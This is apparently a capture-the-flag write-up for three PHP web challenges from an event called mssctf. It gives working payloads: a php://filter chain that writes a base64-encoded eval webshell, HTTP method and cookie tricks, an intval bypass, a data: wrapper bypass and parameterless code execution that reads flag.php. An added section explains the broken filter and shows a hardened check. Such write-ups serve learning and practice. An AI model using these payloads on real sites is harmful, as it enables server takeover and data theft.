Mssctf WEB wp

include

Source code

<?php
error_reporting(0);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_POST['c'];
if(!isset($b)){
    highlight_file(__FILE__);
}
// note: the return value of str_replace() is never used, so $x is not actually filtered
function check_out($x){
    str_replace("data","???",$x);
    str_replace("zip","???",$x);
    str_replace("zlib","???",$x);
    str_replace("file","???",$x);
    str_replace("rot13","???",$x);
}
if($array[++$a]=1){
    if($array[]=1){
        echo "Come on!";
    }else{
        echo "Good,you have already solve the first problem";
        check_out($b);
        file_put_contents($b,"<?php die('Victory is in sight');?>".$c);
    }
}
?>
  • First layer: array index overflow bypass, relying on the increment

payload:a=9223372036854775806

  • Second layer: write the file through the php://filter wrapper. Because the code prepends a PHP tag, it has to be stripped first

payload:b=php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php

  • Third layer: write the base64-encoded content

c=PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=
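The reason the second layer works at all is visible in check_out(): str_replace() returns the filtered string, but the result is thrown away, so $b reaches file_put_contents() untouched, and a denylist of wrapper names would in any case miss php://filter. The following is an added example, not part of the challenge or the writeup, showing the no-op (with a return value added so it can be observed) next to an allowlist-style check; the upload directory and the .txt-only rule are assumptions.

```php
<?php
// Added example: why check_out() in the "include" task is a no-op, and one
// way to validate a write target instead. Not code from the challenge.

// Same body as the challenge's check_out(), plus a return so the effect is
// visible: str_replace() does not modify $x in place, so nothing is filtered.
function check_out_original($x) {
    str_replace("data", "???", $x);
    str_replace("zip", "???", $x);
    str_replace("zlib", "???", $x);
    str_replace("file", "???", $x);
    str_replace("rot13", "???", $x);
    return $x;
}

// Hardened variant (assumption: only bare "name.txt" files inside one fixed
// directory are legitimate). Refuses any stream wrapper and any path
// component rather than trying to enumerate bad scheme names.
function safe_target(string $name, string $dir = '/var/www/uploads'): ?string {
    if (strpos($name, '://') !== false) {            // php://, data://, zip:// ...
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        return null;                                 // no "..", "/", or other extensions
    }
    return $dir . '/' . $name;
}

$wrapper = "php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php";
assert(check_out_original($wrapper) === $wrapper);  // unchanged: the filter did nothing
var_dump(safe_target($wrapper));     // NULL
var_dump(safe_target("../b.php"));   // NULL
var_dump(safe_target("notes.txt"));  // string(26) "/var/www/uploads/notes.txt"
```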

Hs.com

Capturing the request shows the hint Allowed-Request-Method: HS

Requesting with the HS method shows the source

<?php
error_reporting(0);
$fake_data = $_GET['innerspace'];
$data = $_REQUEST['innerspace'];
if ($_SERVER['REQUEST_METHOD'] === "HS") {
    if (isset($data)) {
        if ($data === "mssctf" && $data !== $fake_data) {
            include_once "flag.php";
            echo $flag;
        } else {
            echo "My house is pretty big.";
        }
    } else {
        highlight_file("index.php");
    }
} else {
    header('HTTP/1.1 405 Something Goes Wrong');
    header('Allowed-Request-Method: HS');
}

Note that $fake_data comes from $_GET['innerspace'] while $data comes from $_REQUEST['innerspace']

The if condition only needs $data to be mssctf and $data !== $fake_data

Change the GET method to HS and send innerspace=mssctf in the Cookie header

$fake_data is then empty

$data is mssctf

and the flag is printed

baby php

Classic old tricks

<?php
error_reporting(0);
highlight_file(__FILE__);

$mss1 = $_POST['level1'];
$mss2 = $_POST['level2'];
$mss3 = $_POST['level3'];

if (intval($mss1) < 2021 && intval($mss1 + 2) > 2022) {

    $mss4 = file_get_contents($mss2,'r');
    if ($mss4 === "mssCTF is interesting!") {
        
        if (!preg_match("/[0-9]|\`|\^|\\$|\*|\%|\~|\+|\{|\}|\'|\\\"|\,|\<|\>|\.|\/|\?/i", $mss3)) {
            echo "Regex is so wonderful!";
            echo "<br/>";
            eval($mss3);
        }

        else {
            echo "Success is near!";
            echo "<br/>";
        }
    }

    else {
        echo "Do you like PHP?";
        echo "<br/>";
    }
}

else {
    echo "Level1 is a babe trick,try again!";
    echo "<br/>";
}
  • intval() bypass with scientific notation

payload:level1=1e10

  • file_get_contents() bypass

Bypass it with the data: wrapper

payload:level2=data:,mssCTF%20is%20interesting!

  • The third stage tests parameterless RCE

payload: first use var_dump(scandir(current(localeconv()))); to see at which position flag sits in the listing

then use readfile(next(array_reverse(scandir(current(localeconv()))))); to read flag.php
